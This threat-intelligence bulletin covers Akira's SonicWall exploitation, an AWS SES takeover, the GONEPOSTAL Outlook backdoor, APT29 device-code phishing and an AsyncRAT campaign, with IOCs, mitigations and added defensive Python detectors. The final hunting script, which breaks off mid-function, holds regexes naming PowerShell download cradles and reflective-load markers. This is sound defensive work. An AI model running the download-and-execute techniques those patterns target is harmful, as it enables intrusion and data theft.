F5 Threat Report - September 17th, 2025
Akira Ransomware Exploiting Critical SonicWall SSLVPN Bug Again
The Akira ransomware group is again exploiting CVE-2024-40766, a critical-severity improper access control vulnerability in SonicOS management access and SSL VPN, to gain initial access to target networks. The flaw permits unauthorized resource access and, under specific conditions, can crash the firewall. SonicWall patched it in August 2024 and at the same time strongly recommended resetting the passwords of all locally managed SSLVPN accounts after updating, because credentials exposed before the patch remain valid afterwards and can simply be replayed. Akira began exploiting the flaw in September 2024; recent alerts from the Australian Cyber Security Centre and observations from Rapid7 show a resurgence, most likely against devices that were updated without the accompanying password reset and configuration changes. SonicWall has confirmed that the current activity is tied to CVE-2024-40766 rather than a new zero-day and has investigated up to 40 related incidents. Affected firmware: Gen 5 (5.9.2.14-12o and older), Gen 6 (6.5.4.14-109n and older) and Gen 7 (7.0.1-5035 and older). SonicWall's guidance is to update to a fixed build (7.3.0 or later on Gen 7 hardware), rotate all SonicWall account passwords, enforce multi-factor authentication, remove or restrict the SSLVPN Default Groups configuration, and limit Virtual Office Portal access to trusted networks.
Severity:High
Threat Details and IOCs
CVEs: | CVE-2024-40766 |
Technologies: | SonicWall SonicOS |
Threat Actors: | Akira, Everest, Fog, GoldSahara, PunkSpider, ScatteredLapsusHunters, Storm-1567, UNC4487 |
Attacker Countries: | Russia |
Victim Industries: | Manufacturing, Education, Financial Services, Healthcare, Transportation, Business Services, Retail, Technology, Critical Infrastructure, Construction |
Victim Countries: | Australia |
Mitigation Advice
- Immediately patch all vulnerable SonicWall devices (Gen 5, 6, and 7) to the latest recommended firmware version to remediate CVE-2024-40766.
- Force an immediate password rotation for all locally managed user accounts on SonicWall SSLVPN devices.
- Configure firewall access control lists to restrict access to the SonicWall SSLVPN and Virtual Office Portal interfaces to only trusted IP address ranges.
Compliance Best Practices
- Develop and execute a plan to enforce mandatory multi-factor authentication (MFA) for all users accessing the SonicWall SSLVPN.
- Perform a configuration audit of SonicWall devices to identify and remediate overly permissive settings, specifically focusing on mitigating risks associated with the 'SSLVPN Default Groups'.
- Review and enhance the existing vulnerability management program to ensure timely patching of all internet-facing infrastructure and include a verification step to confirm all required mitigations, such as password resets or configuration changes, are completed.
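The following script is an added example, not SonicWall tooling or anything from the original report. It triages a firmware inventory against the three "and older" thresholds quoted above, parsing SonicOS version strings so that build numbers and platform suffix letters compare correctly. It assumes that any build newer than the quoted threshold within its generation is fixed; the hostnames and versions in `SAMPLE_FLEET` are constructed, and the advisory's per-model fixed builds remain the authority for edge cases (some Gen 6 models run a separate 6.5.2.x branch that this simplification would misreport as vulnerable).

```python
import re

# Added example, not SonicWall tooling. Thresholds are the "and older" versions quoted in the
# report; anything newer within the same generation is assumed patched (check the advisory's
# per-model fixed builds for exceptions such as the Gen 6 6.5.2.x branch).
VULNERABLE_THROUGH = {
    5: "5.9.2.14-12o",   # Gen 5
    6: "6.5.4.14-109n",  # Gen 6
    7: "7.0.1-5035",     # Gen 7
}
GEN7_RECOMMENDED = "7.3.0"   # SonicWall's current target release for Gen 7 hardware

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)+)(?:-(\d+)[a-z]*)?$")


def parse_sonicos_version(text):
    """'6.5.4.14-109n' -> (6, 5, 4, 14, 109).

    Release digits first, then the build number after the hyphen; the trailing letter is a
    platform marker and does not affect ordering. A string without a build gets build 0,
    so '7.0.1' sorts below '7.0.1-5035' (an unknown build is treated as old).
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised SonicOS version string: {text!r}")
    release = tuple(int(part) for part in m.group(1).split("."))
    build = int(m.group(2)) if m.group(2) else 0
    return release + (build,)


def assess_firmware(text):
    """Classify one firmware string: 'vulnerable', 'patched-below-recommended',
    'patched' or 'unknown-generation'."""
    version = parse_sonicos_version(text)
    generation = version[0]
    if generation not in VULNERABLE_THROUGH:
        return "unknown-generation"
    if version <= parse_sonicos_version(VULNERABLE_THROUGH[generation]):
        return "vulnerable"
    if generation == 7 and version < parse_sonicos_version(GEN7_RECOMMENDED):
        return "patched-below-recommended"
    return "patched"


def triage_fleet(devices):
    """devices: iterable of (name, firmware) pairs, e.g. from an NSM/GMS export.
    Returns {status: [names]} so the 'vulnerable' bucket can be worked first."""
    buckets = {}
    for name, firmware in devices:
        try:
            status = assess_firmware(firmware)
        except ValueError:
            status = "unparseable"
        buckets.setdefault(status, []).append(name)
    return buckets


# Constructed inventory for demonstration; hostnames and version strings are made up.
SAMPLE_FLEET = [
    ("fw-branch-01", "7.0.1-5035"),     # exactly the quoted threshold: still exposed
    ("fw-branch-02", "7.0.1-5119"),     # past the threshold but below the recommended 7.3.0
    ("fw-hq-01", "7.3.0-7012"),
    ("fw-legacy-01", "6.5.4.14-109n"),
    ("fw-legacy-02", "6.5.4.15-116n"),
    ("fw-old-01", "5.9.2.14-13o"),
    ("fw-mystery", "build-unknown"),
]

if __name__ == "__main__":
    for status, names in sorted(triage_fleet(SAMPLE_FLEET).items()):
        print(f"{status:26} {', '.join(names)}")
```

Feed it the name/version pairs from your NSM or GMS export. Anything in the `vulnerable` bucket is exposed regardless of whether the password reset was done, `patched-below-recommended` devices are candidates for the 7.3.0 upgrade, and every device in the `patched` bucket still needs the credential rotation and SSLVPN configuration checks above, which a version number cannot confirm.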
From Compromised Keys to Phishing Campaigns: Inside a Cloud Email Service Takeover
A cloud e-mail service takeover campaign in May 2025 used compromised AWS access keys to get around Amazon Simple Email Service (SES) sending restrictions and run large-scale phishing. Having obtained a key with SES permissions, the attackers performed reconnaissance with GetCallerIdentity (STS), GetSendQuota (SES v1) and GetAccount (SES v2) to learn which principal they held and what it could send. They then issued PutAccountDetails requests in several regions within minutes to move the account from the SES sandbox to production, supplying a generic justification that AWS approved. Attempts to raise the sending quota programmatically through the Support CreateCase API and to escalate IAM privileges failed, but the default production quota of 50,000 e-mails per day was enough. The attackers then verified sending domains, both attacker-owned and legitimate third-party domains with weak DMARC policies, and created sender identities such as admin@ and billing@ on them. The resulting infrastructure delivered a phishing campaign themed around 2024 tax forms that linked to a credential-harvesting site hidden behind a commercial redirect service. SES abuse of this kind causes reputational damage (phishing sent from the victim's own account and domains), puts recipients at risk of compromise, carries operational cost, and is a signal that the underlying AWS credentials are compromised more broadly. Organizations should disable or restrict SES where it is not used, audit and rotate access keys regularly, apply least privilege to SES permissions, log and alert on SES API calls (PutAccountDetails above all), and watch for sudden spikes in sending volume or unexpected new sender identities.
Severity:High
Threat Details and IOCs
Technologies: | Amazon Web Services, Amazon Simple Email Service |
Attacker Domains: | managed7.com, street7news.org, street7market.net, docfilessa.com, irss.securesusa.com |
Victim Industries: | Accounting, Energy, Financial Services, Healthcare, Manufacturing |
Victim Countries: | United States |
Mitigation Advice
- Block the following domains at the web proxy, DNS filter, and email gateway: managed7.com, street7news.org, street7market.net, docfilessa.com, and irss.securesusa.com.
- Conduct an immediate audit of all IAM user access keys, focusing on identifying and disabling keys that have been inactive for over 90 days and have suddenly shown activity, or keys used from geographically anomalous locations.
- Create a CloudTrail alert to trigger on multiple `ses:PutAccountDetails` API calls originating from the same IAM principal across different AWS regions within a short time window, such as 5 minutes.
- Configure a CloudTrail alert to trigger on any non-console invocation of the `support:CreateCase` API, especially when related to service quota increases.
- Immediately review your AWS SES configuration in all regions to verify that no unauthorized domains or email addresses have been added as sending identities and that the account has not been unexpectedly moved from the sandbox to "production" mode.
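As an added example (this is not code from the report or from the researchers who documented the campaign), the following Python implements the two CloudTrail detections from the list above against constructed sample records: a principal calling `ses:PutAccountDetails` in two or more regions within five minutes, and `support:CreateCase` from a non-console caller. The account ID, user names, timestamps and user agents are made up, and the console-versus-programmatic test is a user-agent heuristic, not an authoritative CloudTrail field.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=5)   # burst window from the mitigation advice above
MIN_REGIONS = 2                 # distinct regions inside one window that warrant an alert


def _event(time, source, name, region, arn, user_agent):
    """Minimal CloudTrail-shaped record; real records carry many more fields."""
    return {"eventTime": time, "eventSource": source, "eventName": name, "awsRegion": region,
            "userIdentity": {"type": "IAMUser", "arn": arn}, "userAgent": user_agent}


# Constructed sample records (not real telemetry): account ID, users and times are made up.
COMPROMISED = "arn:aws:iam::111111111111:user/ci-mailer"
ADMIN = "arn:aws:iam::111111111111:user/mail-admin"
CLI_UA = "aws-cli/2.15.0 Python/3.11.6 Linux/6.1"
CONSOLE_UA = "console.amazonaws.com"
SAMPLE_EVENTS = [
    _event("2025-05-12T09:58:10Z", "sts.amazonaws.com", "GetCallerIdentity", "us-east-1", COMPROMISED, CLI_UA),
    _event("2025-05-12T09:58:41Z", "ses.amazonaws.com", "GetAccount", "us-east-1", COMPROMISED, CLI_UA),
    _event("2025-05-12T10:00:02Z", "ses.amazonaws.com", "PutAccountDetails", "us-east-1", COMPROMISED, CLI_UA),
    _event("2025-05-12T10:00:15Z", "ses.amazonaws.com", "PutAccountDetails", "us-west-2", COMPROMISED, CLI_UA),
    _event("2025-05-12T10:00:29Z", "ses.amazonaws.com", "PutAccountDetails", "eu-west-1", COMPROMISED, CLI_UA),
    _event("2025-05-12T10:01:44Z", "support.amazonaws.com", "CreateCase", "us-east-1", COMPROMISED, CLI_UA),
    # A legitimate admin enabling production in one region today and another tomorrow: no burst.
    _event("2025-05-12T14:30:00Z", "ses.amazonaws.com", "PutAccountDetails", "us-east-1", ADMIN, CONSOLE_UA),
    _event("2025-05-13T09:10:00Z", "ses.amazonaws.com", "PutAccountDetails", "eu-central-1", ADMIN, CONSOLE_UA),
]


def _timestamp(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _principal(record):
    identity = record.get("userIdentity", {})
    return identity.get("arn") or identity.get("accessKeyId") or identity.get("type", "unknown")


def is_console_call(record):
    """Heuristic (an assumption, not an authoritative CloudTrail field): console-originated
    calls carry these user agents; anything else is treated as programmatic."""
    agent = record.get("userAgent", "")
    return "console.amazonaws.com" in agent or agent == "AWS Internal"


def detect_production_request_burst(events, window=WINDOW, min_regions=MIN_REGIONS):
    """One finding per principal that issued ses:PutAccountDetails in >= min_regions regions
    within `window` of one of its calls."""
    calls_by_principal = defaultdict(list)
    for record in events:
        if record["eventSource"] == "ses.amazonaws.com" and record["eventName"] == "PutAccountDetails":
            calls_by_principal[_principal(record)].append((_timestamp(record), record["awsRegion"]))
    findings = []
    for principal, calls in calls_by_principal.items():
        calls.sort()
        for i, (start, _) in enumerate(calls):
            cluster = [(t, region) for t, region in calls[i:] if t - start <= window]
            regions = {region for _, region in cluster}
            if len(regions) >= min_regions:
                findings.append({"rule": "ses-multi-region-production-request", "principal": principal,
                                 "regions": sorted(regions), "calls": len(cluster),
                                 "first": start.isoformat(), "last": cluster[-1][0].isoformat()})
                break
    return findings


def detect_programmatic_support_case(events):
    """support:CreateCase from a non-console caller, the quota-increase attempt described above."""
    return [{"rule": "support-createcase-non-console", "principal": _principal(record),
             "time": record["eventTime"], "userAgent": record["userAgent"]}
            for record in events
            if record["eventSource"] == "support.amazonaws.com" and record["eventName"] == "CreateCase"
            and not is_console_call(record)]


def run(events=SAMPLE_EVENTS):
    return detect_production_request_burst(events) + detect_programmatic_support_case(events)


if __name__ == "__main__":
    for finding in run():
        print(json.dumps(finding))
```

In production the same functions run over events pulled from CloudTrail Lake, Athena or the SIEM. Tune `WINDOW` and `MIN_REGIONS` to how your own teams enable production access, which is normally one region at a time through the console; a burst across regions from an access key is the campaign's signature, and the earlier `GetCallerIdentity`/`GetAccount` calls from the same key are the reconnaissance worth pulling into the timeline once the alert fires.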
Compliance Best Practices
- Implement and enforce a mandatory 90-day rotation policy for all IAM user access keys and establish a process to automatically disable keys that have not been used for more than 90 days.
- Initiate a project to review and refactor all IAM policies to adhere to the principle of least privilege, specifically restricting permissions for sensitive SES actions like `ses:PutAccountDetails` and `ses:CreateEmailIdentity` to a minimal number of dedicated administrative roles.
- Use AWS Organizations and Service Control Policies (SCPs) to explicitly deny access to the Amazon SES service in all AWS accounts that do not have a legitimate business requirement to send bulk email.
- Develop and execute a phased plan to implement DMARC for all company-owned domains, starting with a `p=none` policy for monitoring and progressively moving to `p=quarantine` and `p=reject` to prevent unauthorized email spoofing.
- Enable AWS CloudTrail logging for all regions in all accounts and forward the logs to a central security information and event management (SIEM) system. Management events cover the control-plane calls used in this campaign (PutAccountDetails, identity creation and verification); for per-message visibility, enable SES data events in CloudTrail where available and configure SES event publishing through a configuration set, since e-mail sending calls are not part of the management event stream.
- Configure AWS CloudWatch anomaly detection on key service metrics, such as SES `SendEmail` volume and S3 `PutObject` counts, to automatically detect and alert on significant deviations from established baselines.
GONEPOSTAL Malware Exploits Outlook for Stealthy Command-and-Control
GONEPOSTAL is a newly documented backdoor, attributed by Kroll to the Russian state-sponsored group it tracks as KTA007 (APT28, Fancy Bear), that turns Microsoft Outlook into a covert command-and-control channel. Infection runs in two stages. A malicious DLL masquerading as `SSPICLI.dll` launches a PowerShell sequence that copies a `testtemp.ini` file into the Outlook profile directory as `VbaProject.OTM` and identifies the victim through DNS lookups and HTTP requests to out-of-band services such as webhook.site. Persistence comes from registry changes beneath `Software\Microsoft\Office\16.0\Outlook`: `LoadMacroProviderOnBoot` is set so the VBA project is loaded automatically, `Level` is lowered so macros run without restriction, and `PONT_STRING` is set to suppress Outlook's security prompts. The core logic lives in the obfuscated, password-protected VBA macros in `VbaProject.OTM`. When Outlook starts, the macro initialises and watches incoming mail for command signatures: `cmd` executes a command and returns its output, `cmdNo` executes silently, `upload` writes a file to the host, and `download` reads a file and exfiltrates it. Payloads are base64-encoded; exfiltrated files are base64-encoded and split into chunks of roughly 3.15 MB sent as e-mail attachments. Processed command e-mails are deleted to remove forensic traces.
Severity:Critical
Threat Details and IOCs
Technologies: | Microsoft Office, Microsoft Outlook, Microsoft Windows |
Threat Actors: | APT28, APT32, FancyBear, KTA007, KTA488, PawnStorm |
Attacker Countries: | Russia |
Attacker Domains: | webhook.site, oast.fun |
Victim Industries: | Government, Aerospace & Defense, Non-Governmental Organization |
Victim Countries: | United States, Norway, Switzerland, Ukraine, France |
Mitigation Advice
- Use your endpoint detection and response (EDR) tool to scan all endpoints for the file 'VbaProject.OTM' within the '%APPDATA%\Microsoft\Outlook\' directory.
- Audit the Windows Registry on all endpoints for unauthorized changes to the 'LoadMacroProviderOnBoot', 'Level' (in the 'Security' subkey) and 'PONT_STRING' values beneath 'HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook'; adjust the version number for other Office releases.
- Add 'webhook.site' and 'oast.fun' to your DNS blocklist and web proxy filter to disrupt the malware's victim identification callback. Both are public out-of-band interaction services that legitimate security testing tools also use, so expect to allow-list them for your own testers.
- Use your EDR or system management tools to identify any instances of 'SSPICLI.dll' that are not digitally signed by Microsoft or are located outside the expected System32 and SysWOW64 directories (a legitimate copy lives only there).
- Search available PowerShell logs for command-line activity involving the copying of files to the Outlook profile directory, specifically looking for the creation of 'VbaProject.OTM'.
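The following Python, an added example rather than Kroll's or the report's tooling, performs the registry and file checks from the list above. `assess_outlook_macro_settings` evaluates a snapshot of the Outlook key taken with `snapshot_outlook_key` (Windows only, via `winreg`) or built from an offline registry export; it looks `LoadMacroProviderOnBoot` and `PONT_STRING` up by value name so the check does not depend on the exact subkey a given Office build stores them in. The `Level` to Trust Center mapping is Outlook's documented one; the sample snapshots are constructed, with a placeholder data value for `PONT_STRING`.

```python
import os
import sys
from pathlib import Path

OUTLOOK_KEY = r"Software\Microsoft\Office\16.0\Outlook"   # 16.0 = Office 2016/2019/2021/365

# Outlook Trust Center macro settings as stored in Security\Level.
LEVEL_NAMES = {
    1: "Enable all macros",
    2: "Notifications for all macros",
    3: "Notifications for digitally signed macros only (default)",
    4: "Disable all macros without notification",
}


def _lookup(values, value_name):
    """Find a value by name anywhere under the snapshot. Returns (relative_path, data)
    or (None, None)."""
    for path, data in values.items():
        if path.split("\\")[-1].lower() == value_name.lower():
            return path, data
    return None, None


def assess_outlook_macro_settings(values):
    """values: {path relative to OUTLOOK_KEY: data}. Returns [(severity, reason), ...]."""
    findings = []
    path, data = _lookup(values, "LoadMacroProviderOnBoot")
    if data == 1:
        findings.append(("high", f"{path}=1: VbaProject.OTM macros load at every Outlook start"))
    level = values.get(r"Security\Level")
    if level == 1:
        findings.append(("high", f"Security\\Level=1 ({LEVEL_NAMES[1]}): unsigned VBA runs without a prompt"))
    elif level == 2:
        findings.append(("medium", f"Security\\Level=2 ({LEVEL_NAMES[2]}): weaker than the default level 3"))
    path, data = _lookup(values, "PONT_STRING")
    if path is not None:
        findings.append(("medium", f"{path} present: Outlook warning prompts are being suppressed"))
    return findings


def find_vbaproject_otm(appdata=None):
    """Path of %APPDATA%\\Microsoft\\Outlook\\VbaProject.OTM if it exists, else None. Existence
    alone is not proof of compromise (user macros live there too), but on a fleet that does not
    use Outlook VBA it is a strong lead and the file should be pulled for analysis."""
    base = Path(appdata if appdata is not None else os.environ.get("APPDATA", ""))
    candidate = base / "Microsoft" / "Outlook" / "VbaProject.OTM"
    return candidate if candidate.is_file() else None


def snapshot_outlook_key(root_path=OUTLOOK_KEY):
    """Windows only: read every value under HKCU\\<root_path> into {relative_path: data}."""
    if sys.platform != "win32":
        raise RuntimeError("registry snapshot only works on Windows")
    import winreg

    values = {}

    def walk(handle, prefix):
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(handle, index)
            except OSError:
                break
            values[f"{prefix}\\{name}" if prefix else name] = data
            index += 1
        index = 0
        while True:
            try:
                subkey = winreg.EnumKey(handle, index)
            except OSError:
                break
            with winreg.OpenKey(handle, subkey) as child:
                walk(child, f"{prefix}\\{subkey}" if prefix else subkey)
            index += 1

    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, root_path) as root:
        walk(root, "")
    return values


# Constructed snapshots: the tampered one mirrors the state described above (the PONT_STRING
# data is a placeholder; its presence is what matters), the other is a stock profile.
SAMPLE_TAMPERED = {
    "LoadMacroProviderOnBoot": 1,
    r"Security\Level": 1,
    r"Options\General\PONT_STRING": "placeholder",
    r"Options\General\ConstructedUnrelatedValue": 0,
}
SAMPLE_DEFAULT = {r"Security\Level": 3}

if __name__ == "__main__":
    snapshot = snapshot_outlook_key() if sys.platform == "win32" else SAMPLE_TAMPERED
    for severity, reason in assess_outlook_macro_settings(snapshot):
        print(f"[{severity}] {reason}")
    print("VbaProject.OTM:", find_vbaproject_otm())
```

Run it under each user's own session (the key and the OTM file are per-user), or point `assess_outlook_macro_settings` at a dictionary built from a `reg export` of the same key collected by your EDR. A `LoadMacroProviderOnBoot` of 1 together with `Level` of 1 is the combination the malware needs, and the two together on a host that never used Outlook VBA should be treated as an incident rather than a configuration finding.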
Compliance Best Practices
- Implement a Group Policy (GPO) that sets Outlook's macro security to 'Notifications for digitally signed macros, all other macros disabled' or, where Outlook VBA is not used, 'No warnings and disable all macros' (the current equivalents of the legacy 'High' and 'Very High' levels), so that only macros signed by a trusted publisher can run. Because the policy value lives under the Policies hive, a user-level change to 'Level' like the one described above no longer takes effect.
- Enable PowerShell Script Block Logging and Module Logging across all endpoints and forward these logs to a centralized SIEM for monitoring and alerting on suspicious script execution.
- Configure your Endpoint Detection and Response (EDR) solution to generate alerts when Microsoft Office applications, such as Outlook.exe, spawn child processes like PowerShell.exe or Cmd.exe.
- Deploy an application control technology, such as Windows Defender Application Control (WDAC) or AppLocker, to enforce a policy that only allows authorized and signed DLLs and scripts to execute.
- Enable registry auditing on endpoints for critical Microsoft Office security keys and forward these events to a SIEM to create alerts for unauthorized modifications.
Amazon Disrupts Russian APT29 Hackers Targeting Microsoft 365
Amazon's threat intelligence team disrupted an operation by the Russian state-sponsored group Midnight Blizzard (APT29) aimed at Microsoft 365 accounts and data. The group compromised legitimate websites so that a small fraction of visitors were redirected to attacker infrastructure mimicking Cloudflare human-verification pages, hosted on domains such as findcloudflare[.]com and cloudflare[.]redirectpartners[.]com. The goal was to trick users into completing Microsoft's device code authentication flow on the attacker's behalf: the victim enters an attacker-generated code at Microsoft's device login page, and the resulting tokens are issued to the attacker-controlled device, giving access to the account and its data without the attacker ever handling a password or an MFA code. Amazon identified the campaign, isolated the actor's EC2 instances, and worked with Cloudflare and Microsoft to take down the domains; it continues to track and disrupt the group as it shifts infrastructure. The campaign marks a change in APT29's tradecraft, away from the AWS-impersonation phishing Amazon had observed from the group previously and toward abuse of a legitimate authentication flow. Users should verify any device authorization prompt they did not initiate, enable multi-factor authentication, and never run commands copied from web pages. Administrators should disable the device code flow where it is not needed, enforce Conditional Access policies, and monitor for suspicious authentication events.
Severity:Critical
Threat Details and IOCs
Technologies: | Cloudflare, Microsoft Entra ID, Microsoft Windows |
Threat Actors: | APT29, MidnightBlizzard, UNC2452 |
Attacker Countries: | Russia |
Attacker Domains: | findcloudflare[.]com, cloudflare[.]redirectpartners[.]com |
Victim Industries: | Government, Information Technology |
Victim Countries: | United States, Germany |
Mitigation Advice
- Add the domains 'findcloudflare[.]com' and 'cloudflare[.]redirectpartners[.]com' to your web filter, DNS sinkhole, and firewall blocklists.
- In Microsoft Entra ID, create a Conditional Access policy to block the 'Device code flow' authentication flow for all users, unless there is a specific business requirement for it.
- Review Microsoft Entra ID sign-in logs for all authentication events that used the 'Device code' flow. Investigate any successful authentications from unfamiliar locations or devices.
- Send a security advisory to all employees warning them to be suspicious of any unexpected prompts to authorize a new device sign-in for their Microsoft 365 account, especially if it originates from a web browser.
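An added example, not Amazon's or Microsoft's code: the Python below reviews Microsoft Entra sign-in records for the device code flow using the `authenticationProtocol` field of the Graph `signIn` resource. It rates each successful device code sign-in against the user's own baseline of countries seen in their other sign-ins and against the device's compliance state, and separately flags hours in which tenant-wide device code sign-ins reach a threshold, since a watering-hole campaign produces a cluster even when each individual sign-in looks plausible. The sample records, users, IPs and the threshold value are constructed; `oAuth2` is used as the protocol of the ordinary interactive sign-ins.

```python
from collections import Counter, defaultdict
from datetime import datetime, timezone

DEVICE_CODE = "deviceCode"        # signIn.authenticationProtocol value for this flow
HOURLY_VOLUME_THRESHOLD = 3       # tenant-wide device code sign-ins per hour worth a page; tune to your baseline


def _signin(when, upn, protocol, ip, country, app, error_code=0, compliant=True):
    """The subset of Microsoft Graph signIn fields the checks below use."""
    return {"createdDateTime": when, "userPrincipalName": upn, "authenticationProtocol": protocol,
            "ipAddress": ip, "location": {"countryOrRegion": country}, "appDisplayName": app,
            "status": {"errorCode": error_code}, "deviceDetail": {"isCompliant": compliant}}


# Constructed sample (not real tenant data): users, IPs and times are made up.
SAMPLE_SIGNINS = [
    _signin("2025-08-20T08:05:00Z", "alice@example.com", "oAuth2", "198.51.100.10", "US", "Microsoft Office"),
    _signin("2025-08-21T08:12:00Z", "alice@example.com", "oAuth2", "198.51.100.10", "US", "Microsoft Office"),
    _signin("2025-08-22T13:02:00Z", "bob@example.com", "oAuth2", "198.51.100.22", "US", "Microsoft Office"),
    # Engineer logging in from a headless box with a CLI: expected, in-baseline device code use.
    _signin("2025-08-22T13:40:00Z", "bob@example.com", DEVICE_CODE, "198.51.100.22", "US", "Microsoft Azure CLI"),
    # Tokens issued to an unmanaged device in a country alice has never signed in from.
    _signin("2025-08-22T13:47:00Z", "alice@example.com", DEVICE_CODE, "203.0.113.77", "NL", "Microsoft Office", compliant=False),
    # A user with no interactive history at all: nothing to compare against, so treat as high.
    _signin("2025-08-22T13:51:00Z", "dave@example.com", DEVICE_CODE, "203.0.113.78", "NL", "Microsoft Office", compliant=False),
]


def _timestamp(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def country_baseline(signins):
    """Countries each user has successfully signed in from with any flow other than device code."""
    baseline = defaultdict(set)
    for s in signins:
        if s["authenticationProtocol"] != DEVICE_CODE and s["status"]["errorCode"] == 0:
            baseline[s["userPrincipalName"]].add(s["location"]["countryOrRegion"])
    return baseline


def review_device_code_signins(signins):
    """One finding per successful device code sign-in, rated against the user's own baseline."""
    baseline = country_baseline(signins)
    findings = []
    for s in signins:
        if s["authenticationProtocol"] != DEVICE_CODE or s["status"]["errorCode"] != 0:
            continue
        upn, country = s["userPrincipalName"], s["location"]["countryOrRegion"]
        reasons = []
        if country not in baseline.get(upn, set()):
            reasons.append(f"{country} is not in the user's interactive sign-in baseline")
        if not s["deviceDetail"]["isCompliant"]:
            reasons.append("device not marked compliant")
        findings.append({"user": upn, "time": s["createdDateTime"], "ip": s["ipAddress"],
                         "app": s["appDisplayName"], "severity": "high" if reasons else "low",
                         "reasons": reasons})
    return findings


def device_code_volume_alerts(signins, threshold=HOURLY_VOLUME_THRESHOLD):
    """Hours in which tenant-wide device code sign-ins reached the threshold."""
    per_hour = Counter()
    for s in signins:
        if s["authenticationProtocol"] == DEVICE_CODE:
            per_hour[_timestamp(s["createdDateTime"]).strftime("%Y-%m-%dT%H:00Z")] += 1
    return {hour: count for hour, count in per_hour.items() if count >= threshold}


if __name__ == "__main__":
    for finding in review_device_code_signins(SAMPLE_SIGNINS):
        print(finding)
    print("volume alerts:", device_code_volume_alerts(SAMPLE_SIGNINS))
```

The same logic ports directly to a scheduled query on the `SigninLogs` table (`AuthenticationProtocol == "deviceCode"`) once the baseline window is widened to 30 days or more. Even a `low` finding deserves a look while the Conditional Access block above is being rolled out: revoking the user's refresh tokens after a confirmed `high` finding is what actually ends the attacker's access, since the stolen tokens keep working after a password change.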
Compliance Best Practices
- Initiate a project to review and strengthen all Microsoft Entra ID Conditional Access policies to enforce location-based, device-based, and risk-based access controls for all cloud applications.
- Implement and enforce phishing-resistant Multi-Factor Authentication (MFA), such as FIDO2 security keys or certificate-based authentication, for all users, prioritizing privileged accounts.
- Implement a continuous security awareness training program that includes phishing simulations specifically designed to mimic modern threats like consent phishing and device authorization abuse.
- Integrate Microsoft Entra ID sign-in and audit logs into your SIEM to develop specific detection rules and alerts for anomalous authentication patterns, such as an unusual volume of device code authentications or sign-ins from non-compliant devices.
Fileless Malware Deploys Advanced RAT via Legitimate Tools
A largely fileless campaign has been identified that abuses legitimate system tools to deploy AsyncRAT, a widely used remote access Trojan. The intrusion starts from a ScreenConnect client under attacker control, with the interactive session relayed through `relay.shipperzone[.]online`. A VBScript, `Update.vbs`, then runs a PowerShell command that downloads two payloads, `logs.ldk` and `logs.ldr`, into `C:\Users\Public\`. The downloaded blobs are turned into .NET assemblies and loaded with reflection directly into memory, so the executable code never exists on disk in a form that file-based scanning recognises. The first-stage assembly, `Obfuscator.dll`, contains classes that initialise the runtime, create a scheduled task named "Skype Updater" for persistence, and disable Windows security logging. The final payload, `AsyncClient.exe`, is the command-and-control engine, talking to domains such as `3osch20[.]duckdns[.]org` over a TCP-based protocol. This AsyncRAT variant performs system reconnaissance, runs commands, and exfiltrates data including operating system details, privilege level, antivirus status, active window titles and the presence of cryptocurrency wallet browser extensions such as MetaMask and Phantom, and it keylogs with window context.
Severity:Critical
Threat Details and IOCs
CVEs: | CVE-2024-1709, CVE-2024-1708 |
Attacker Domains: | 3osch20.duckdns[.]org, relay.shipperzone[.]online |
Technologies: | ConnectWise ScreenConnect, Microsoft Windows |
Victim Industries: | Financial Services, Cryptocurrency |
Victim Countries: | United States |
Mitigation Advice
- Block the domains `relay.shipperzone[.]online` and `3osch20[.]duckdns[.]org` at the network perimeter firewall and in the corporate DNS filtering solution.
- Use your Endpoint Detection and Response (EDR) or system management tools to scan all endpoints for the existence of `logs.ldk` and `logs.ldr` in the `C:\Users\Public\` directory.
- Scan all Windows systems for a scheduled task named 'Skype Updater' and investigate any machines where this task is found.
- Immediately audit all on-premise and cloud ScreenConnect instances to ensure they are patched to the latest version, review user accounts for unauthorized additions, and enforce multi-factor authentication for all remote access.
- In your SIEM or EDR, hunt for instances of `WScript.exe` spawning `PowerShell.exe` with a command line that downloads files, the chain described above.
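To make the hunt in the last item concrete, the following Python is an added example (not the researchers' or the report's code) that evaluates Sysmon Event ID 1 style process records against the chain described above: a ScreenConnect client spawning a script host, `wscript.exe` spawning PowerShell with download or reflective-load markers, staging under `C:\Users\Public\`, and creation of the 'Skype Updater' scheduled task. It decodes `-EncodedCommand` payloads before matching, since the cradle is often hidden that way. The sample events are constructed, `example.invalid` stands in for the attacker host, and the ScreenConnect client service binary name is an assumption to confirm in your environment.

```python
import base64
import re

# Process names are standard Windows binaries; the ScreenConnect client service name is the
# usual one for the installed client and is an assumption to confirm in your environment.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
REMOTE_ACCESS = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}

DOWNLOAD_MARKERS = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|\bcurl\b|\bwget\b|downloadstring|"
    r"downloadfile|downloaddata|net\.webclient|start-bitstransfer", re.I)
MEMORY_LOAD_MARKERS = re.compile(
    r"reflection\.assembly\]::load|\[assembly\]::load|frombase64string|invoke-expression|\biex\b", re.I)
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)
TASK_NAME = re.compile(r"skype updater", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded(cmdline):
    """Append the decoded payload of any -EncodedCommand (base64 of UTF-16LE) so the markers
    above can match what actually runs, not just the wrapper."""
    expanded = cmdline
    for blob in ENCODED_ARG.findall(cmdline):
        try:
            expanded += " " + base64.b64decode(blob).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return expanded


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_process_event(event):
    """event: Sysmon Event ID 1 style dict with ParentImage, Image and CommandLine.
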